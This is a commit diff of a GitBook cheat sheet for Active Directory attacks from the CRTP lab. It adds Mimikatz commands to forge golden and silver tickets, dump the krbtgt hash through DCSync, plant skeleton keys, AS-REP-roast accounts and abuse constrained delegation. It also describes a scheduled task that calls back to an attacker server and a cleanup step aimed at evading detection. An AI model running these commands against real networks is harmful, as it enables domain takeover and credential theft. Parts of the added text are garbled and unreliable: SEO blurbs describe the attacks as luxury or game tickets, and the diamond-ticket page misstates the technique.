GITBOOK-70: No subject

SUMMARY.md

@@ -49,7 +49,7 @@
 
 * [🔥 Golden tickets](domain-persistence/golden-tickets.md)
 * [🥈 Silver Tickets](domain-persistence/silver-tickets.md)
-* [💎 Diamond Ticket](domain-persistence/diamond-ticket.md)
+* [💎 Diamond Tickets](domain-persistence/diamond-tickets.md)
 * [🚒 Skeleton Keys](domain-persistence/skeleton-keys.md)
 * [DSRM](domain-persistence/dsrm.md)
 * [Custom SSP - Track logons](domain-persistence/custom-ssp-track-logons.md)

assume-breach-execution-cycle.md

@@ -1,4 +1,8 @@
 ---
+description: >-
+  Discover comprehensive insights into the Assume Breach Execution Cycle in our
+  in-depth article. Learn strategies, understand its implications and how it
+  impacts cybersecurity.
 cover: .gitbook/assets/CRTP.png
 coverY: 0
 layout:
@@ -21,6 +25,16 @@ layout:
 
 <figure><img src=".gitbook/assets/image (8).png" alt="CRTP - Assume Breach"><figcaption></figcaption></figure>
 
-CRTP Lab uses the methodology "Assume Breach", they provide us with a user account with low-level privileges, and the focus of the exam is after the **Initial Comprise** phase. No phishing, no exploits, no CVEs - Let's Live Of The Land while breaching ADs.
+CRTP Lab uses the methodology "Assume Breach", they provide us with a user account with low-level privileges, and the focus of the exam is after the **Initial Comprise** phase.&#x20;
+
+No phishing, no exploits, no CVEs - Let's Live Of The Land while breaching ADs.
+
+#### Initial Access Granted
+
+Upon starting the CRTP Lab's challenge, a low-level user account is already compromised. With the Initial Compromise phase out of the way, the real test of skill begins.
+
+#### Mission Objective: Privilege Escalation
+
+Using only native tools and resources, our task is to escalate privileges within the Active Directory environment. This environment mimics real-world networks, requiring careful maneuvering and a deep understanding of AD
 
 {% embed url="https://digitalocean.pxf.io/c/3259613/1373783/15890" %}

domain-enumeration/domain-trusts.md

@@ -1,3 +1,9 @@
+---
+description: >-
+  Explore our comprehensive article on Domain Trusts, an essential aspect in
+  network security.
+---
+
 # 7⃣ Domain Trusts
 
 ### **Get a list of all the domain trusts for the current domain**
@@ -33,3 +39,30 @@ Get-NetForestTrust
 Get-NetForestTrust -Forest <domain name>
 Get-NetForestDomain -Verbose | Get-NetDomainTrust
 ```
+
+#### Check domain trust for a specific domain
+
+```
+Get-NetDomainTrust -Domain <specific domain name>
+```
+
+#### Get the forest trust status
+
+```
+Get-NetForestTrustStatus
+Get-NetForestTrustStatus -Forest <domain name>
+```
+
+#### Retrieve Domain Controllers for a specific domain
+
+```
+Get-NetDomainController
+Get-NetDomainController -DomainName <specific domain name>
+```
+
+#### Enumerate Organization Units (OUs) in a domain
+
+```
+Get-NetOU -Domain <domain name>
+Get-NetOU -Domain <domain name> -FullData
+```

domain-persistence/diamond-tickets.md

@@ -0,0 +1,39 @@
+---
+description: >-
+  Dive into our comprehensive article about Diamond Tickets, exploring their
+  value, significance, and usage. Discover what sets these tickets apart in the
+  world of luxury and exclusivity.
+---
+
+# 💎 Diamond Tickets
+
+### What are Kerberos Diamond Tickets?
+
+Kerberos Diamond Tickets are perceived to be a special class or enhanced form of [Ticket Granting Tickets (TGTs)](https://en.wikipedia.org/wiki/Ticket\_Granting\_Ticket) used in Kerberos authentication systems. While the term "Diamond Ticket" is not officially recognized in Kerberos protocol standards, it's sometimes used in security circles to describe a TGT with unusually broad or potentially harmful capabilities.
+
+**Key Features of Diamond Tickets**
+
+* Elevated Privileges: "Diamond Tickets" may have extended access rights, granting the bearer more power within a network than typical tickets.
+* Persistence: These tickets might be designed for long-term use, potentially bypassing conventional time restrictions.
+* Stealth: Diamond Tickets could be engineered to evade standard security detections, making them sinister in the context of cybersecurity threats.
+
+**Security Implications**
+
+It's crucial to understand that the existence of Kerberos Diamond Tickets might indicate a serious security compromise. Their creation would typically require high-level access to a Kerberos Key Distribution Center (KDC), implying a breach of significant magnitude.
+
+For the integrity of a network, security professionals should:
+
+1. Regularly monitor ticket creations and usages within the Kerberos infrastructure.
+2. Have robust security measures in place to detect unauthorized access to critical components like the KDC.
+3. Ensure the principle of least privilege is followed to limit the capabilities of any one user or ticket.
+
+**Note:** While the terminology of "Diamond Tickets" isn't standard, any ticket with abnormal permissions or lifespan should be investigated immediately.
+
+**Mitigation Strategies**
+
+1. **Auditing:** Conduct regular audits of the Kerberos authentication system to check for any anomalies.
+2. **Limited Lifespans:** Enforce policies that limit the lifespan of tickets, regardless of their permissions.
+3. **Education:** Keep staff informed about the latest security threats and protocols to prevent accidental creation or facilitation of such powerful entities within the Kerberos framework.
+
+In conclusion, while "Diamond Tickets" are not an official component of the Kerberos protocol, the concept serves as a cautionary tale about potential security risks and the importance of vigilant cybersecurity practices.
+

domain-persistence/golden-tickets.md

@@ -1,3 +1,10 @@
+---
+description: >-
+  Explore our thorough article about Golden tickets, unlocking the mysteries
+  behind this sought-after treasure in events and games. Dive into the golden
+  opportunity now!
+---
+
 # 🔥 Golden tickets
 
 ### **ump hashes - Get the krbtgt hash**
@@ -32,6 +39,48 @@ Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>
 
 <table data-card-size="large" data-view="cards" data-full-width="true"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th><th data-hidden data-card-cover data-type="files"></th></tr></thead><tbody><tr><td>Commands: <a href="https://gitbook.ad-attacks.com/domain-persistence/golden-ticket">https://gitbook.ad-attacks.com/domain-persistence/golden-ticket</a></td><td></td><td></td><td><a href="https://gitbook.ad-attacks.com/domain-persistence/golden-ticket">https://gitbook.ad-attacks.com/domain-persistence/golden-ticket</a></td><td><a href="../.gitbook/assets/Golden Tickets.png">Golden Tickets.png</a></td></tr><tr><td>All About Active Directory Hacking</td><td><a href="https://ad-attacks.com/golden-ticket-attack-explained/">Golden Tickets Theory</a></td><td></td><td><a href="https://ad-attacks.com/">https://ad-attacks.com/</a></td><td><a href="../.gitbook/assets/Homepage.png">Homepage.png</a></td></tr></tbody></table>
 
+#### Extract krbtgt hash using Mimikatz
+
+To retrieve the krbtgt account hash which is essential for creating Golden Tickets, use the following command on a target machine with appropriate permissions:
+
+```powershell
+Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>
+```
+
+#### Generating a Golden Ticket
+
+After obtaining the necessary krbtgt hash and domain SID, a Golden Ticket can be created. The command below will generate and automatically pass the ticket to the session:
+
+```powershell
+Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
+```
+
+To save the ticket to a file instead of loading it into the current process, replace `/ptt` with `/ticket`.
+
+#### Acquire krbtgt hash via DCSync
+
+For users with Domain Administrator privileges, the krbtgt hash can also be obtained by simulating a Domain Controller synchronization process:
+
+```powershell
+Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'
+```
+
+#### Verify WMI Permissions
+
+To check the Windows Management Instrumentation (WMI) permissions on a specific computer, use the following PowerShell command:
+
+```powershell
+Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>
+```
+
+#### Understanding Golden Tickets
+
+Deepening your knowledge of Active Directory attacks, specifically Golden Tickets, is crucial. Study the theory and practice through the resource provided below:
+
+* Active Directory Hacking Guide
+* Golden Ticket Concepts
+* Detailed Commands: [AD Attacks GitBook](https://gitbook.ad-attacks.com/domain-persistence/golden-ticket)
+
 ### Sources
 
 {% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets" %}

domain-persistence/silver-tickets.md

@@ -1,3 +1,9 @@
+---
+description: >-
+  Discover everything you need to know about Silver Tickets in our comprehensive
+  guide. Learn origins, uses, and important facts related to Silver Tickets.
+---
+
 # 🥈 Silver Tickets
 
 ### **Make silver ticket for CIFS**
@@ -8,7 +14,7 @@ Use the hash of the local computer
 Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:CIFS /rc4:<local computer hash> /user:Administrator /ptt"'
 ```
 
-### **Check access (After CIFS silver ticket)**
+### **Check Access (After CIFS silver ticket)**
 
 ```
 ls \\<servername>\c$\
@@ -28,7 +34,7 @@ schtasks /create /S <target> /SC Weekly /RU "NT Authority\SYSTEM" /TN "Reverse"
 schtasks /Run /S <target> /TN “Reverse”
 ```
 
-### **Make silver ticket for WMI**
+### **Make a silver ticket for WMI**
 
 Execute for WMI /service:HOST /service:RPCSS
 
@@ -44,6 +50,28 @@ Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain>
 Get-wmiobject -Class win32_operatingsystem -ComputerName <target>
 ```
 
+#### Creating Kerberos Silver Tickets using Mimikatz
+
+This section outlines the process to create Kerberos Silver Tickets for different services allowing unauthorized access to a domain-joined computer using the Mimikatz tool.
+
+* **CIFS Silver Ticket:** To access shared files over the network (`CIFS` service), use the local computer's hash to create the ticket.
+* **HOST Silver Ticket:** To perform tasks on the host computer (`HOST` service), again use the local computer's hash.
+* **WMI Silver Ticket:** For Windows Management Instrumentation access (`WMI` service), create tickets with `HOST` and `RPCSS` services specified.
+
+**Access Verification and Task Execution**
+
+Check access to the server's shared drive after obtaining the CIFS ticket, and create a scheduled task on the target computer after obtaining the HOST ticket. The task will reverse-connect to an attacker-controlled server.
+
+**Verify WMI Permissions**
+
+After obtaining the WMI Silver Ticket, verify the permissions by querying the operating system details with `Get-wmiobject`.
+
+***
+
+#### Security Implications
+
+The above instructions are indicative of malicious activities that are commonly associated with lateral movement and privilege escalation in cybersecurity breaches using forged Kerberos tickets. It is crucial to ensure that these instructions are used for legal purposes such as security training or penetration testing with appropriate permissions. Unauthorized use of these techniques is illegal and unethical.
+
 ### Sources
 
 {% embed url="https://adsecurity.org/?p=2011" %}

domain-persistence/skeleton-keys.md

@@ -6,6 +6,16 @@
 Invoke-MimiKatz -Command '"privilege::debug" "misc::skeleton"' -Computername <target>
 ```
 
+To create a skeleton key on a target computer that allows access to any account on that system without requiring a password change, you would need to have Domain Admin (DA) privileges. The Mimikatz command to execute this action is as follows:
+
+```powershell
+Invoke-MimiKatz -Command '"privilege::debug" "misc::skeleton"' -Computername <target>
+```
+
+Replace `<target>` with the hostname or IP address of the computer, you wish to create a skeleton key for.&#x20;
+
+This command must be run with administrative rights, hence the requirement for DA privileges.
+
 ### Sources
 
 {% embed url="https://pentestlab.blog/2018/04/10/skeleton-key/" %}

domain-privilege-escalation/as-reps-roasting.md

@@ -49,3 +49,77 @@ Invoke-ASREPRoast -Verbose | fl
 ```
 Hashcat -a 0 -m 18200 hash.txt rockyou.txt
 ```
+
+### Active Directory Kerberos Enumeration and Modification
+
+#### Enumerating Accounts with Disabled Kerberos Pre-Authentication
+
+First, load the PowerView PowerShell module:
+
+```powershell
+. .\Powerview_dev.ps1
+```
+
+Then, retrieve all users with pre-authentication not required, using:
+
+```powershell
+Get-DomainUser -PreauthNotRequired -Verbose
+```
+
+Or, list only their usernames:
+
+```powershell
+Get-DomainUser -PreauthNotRequired -verbose | select samaccountname
+```
+
+#### Enumerating Permissions for a Group
+
+To find permissions for a specific group:
+
+```powershell
+Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"}
+```
+
+For a detailed list:
+
+```powershell
+Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
+```
+
+#### Disabling Kerberos Pre-Authentication for a User
+
+Load the PowerView script and run:
+
+```powershell
+. ./PowerView_dev.ps1
+Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
+```
+
+#### Requesting Encrypted AS-REP for a User
+
+After loading the ASREPRoast script:
+
+```powershell
+. ./ASREPRoast.ps1
+Get-ASREPHash -Username <username> -Verbose
+```
+
+#### Roasting Users with Pre-Auth Disabled
+
+To enumerate and roast all users:
+
+```powershell
+Invoke-ASREPRoast -Verbose
+Invoke-ASREPRoast -Verbose | fl
+```
+
+#### Cracking the Hash
+
+Finally, crack the retrieved hash using hashcat:
+
+```bash
+Hashcat -a 0 -m 18200 hash.txt rockyou.txt
+```
+
+```
+```

domain-privilege-escalation/constrained-delegation.md

@@ -1,3 +1,10 @@
+---
+description: >-
+  Dive into our comprehensive article exploring the intricacies of Constrained
+  Delegation. Uncover its functions, role, and understanding its impact for an
+  effective system management strategy.
+---
+
 # 🟢 Constrained Delegation
 
 **Enumerate users with contrained delegation enabled**
@@ -62,3 +69,55 @@ Tgs::s4u /tgt:<kirbi file> /user:Administrator@<domain> /service:time/dcorp-dc.d
 Invoke-Mimikatz -Command '"Kerberos::ptt <kirbi file>"'
 Invoke-Mimikatz -Command '"lsadump::dcsync /user:<shortdomain>\krbtgt"'
 ```
+
+#### Additional Enumeration Techniques
+
+Discover additional services allowing delegation:
+
+```
+Get-ADObject -Filter {msDS-AllowedToActOnBehalfOfOtherIdentity -ne '$null'} -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
+
+```
+
+#### Further Exploitation
+
+**Extract and Use TGT**
+
+Using the extracted TGT for impersonation:
+
+```
+Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
+```
+
+Then, using the ticket:
+
+```
+Invoke-Mimikatz -Command '"kerberos::ptt <path to .kirbi ticket>"'
+```
+
+**Execute Commands with the Impersonated Identity**
+
+Once ticket is injected, use it to execute commands:
+
+```
+Invoke-Command -ScriptBlock { whoami; Get-Process } -Credential $cred -ComputerName
+```
+
+Where `$cred` is a PSCredential object created with the credentials of any user you've impersonated.
+
+#### Cleaning Up
+
+Remember to remove any traces of your activities:
+
+```
+Invoke-Mimikatz -Command '"kerberos::purge"'
+```
+
+This ensures the removal of all Kerberos tickets from the current session and helps avoid detection.
+
+#### Additional Resources
+
+For more information on Kerberos delegation and related attacks, refer to the following resources:
+
+* [Microsoft Documentation on Kerberos Constrained Delegation](https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview)
+* [Harmj0y's Guide to Kerberos Abuse](https://www.harmj0y.net/blog/tag/kerberos/)